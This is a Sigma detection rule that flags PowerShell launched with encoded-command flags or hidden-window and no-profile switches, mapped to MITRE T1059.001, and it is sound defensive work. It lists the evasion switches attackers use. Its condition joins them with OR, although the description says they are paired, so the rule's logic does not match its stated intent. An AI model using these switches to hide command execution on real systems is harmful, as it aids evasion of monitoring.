| 1 | title: PowerShell EncodedCommand Execution |
| 2 | id: 99410337-d137-401f-ac19-3977cfa523a4 |
| 3 | status: experimental |
| 4 | description: > |
| 5 | Detects PowerShell launched with an encoded command payload, frequently used to |
| 6 | hide intent during initial access and execution. Pairs an -EncodedCommand style flag |
| 7 | with the common evasion switches. |
| 8 | references: |
| 9 | - https://attack.mitre.org/techniques/T1059/001/ |
| 10 | author: Zion Boggan |
| 11 | date: 2026-05-12 |
| 12 | tags: |
| 13 | - attack.execution |
| 14 | - attack.t1059.001 |
| 15 | logsource: |
| 16 | product: windows |
| 17 | category: process_creation |
| 18 | detection: |
| 19 | selection_img: |
| 20 | - Image|endswith: '\powershell.exe' |
| 21 | - Image|endswith: '\pwsh.exe' |
| 22 | - OriginalFileName: 'PowerShell.EXE' |
| 23 | selection_enc: |
| 24 | CommandLine|contains: |
| 25 | - ' -enc ' |
| 26 | - ' -encodedcommand ' |
| 27 | - ' -ec ' |
| 28 | selection_flags: |
| 29 | CommandLine|contains: |
| 30 | - ' -nop' |
| 31 | - ' -noprofile' |
| 32 | - ' -w hidden' |
| 33 | - ' -windowstyle hidden' |
| 34 | condition: selection_img and (selection_enc or selection_flags) |
| 35 | falsepositives: |
| 36 | - Some management tooling and installers use encoded commands; baseline by parent process. |
| 37 | level: medium |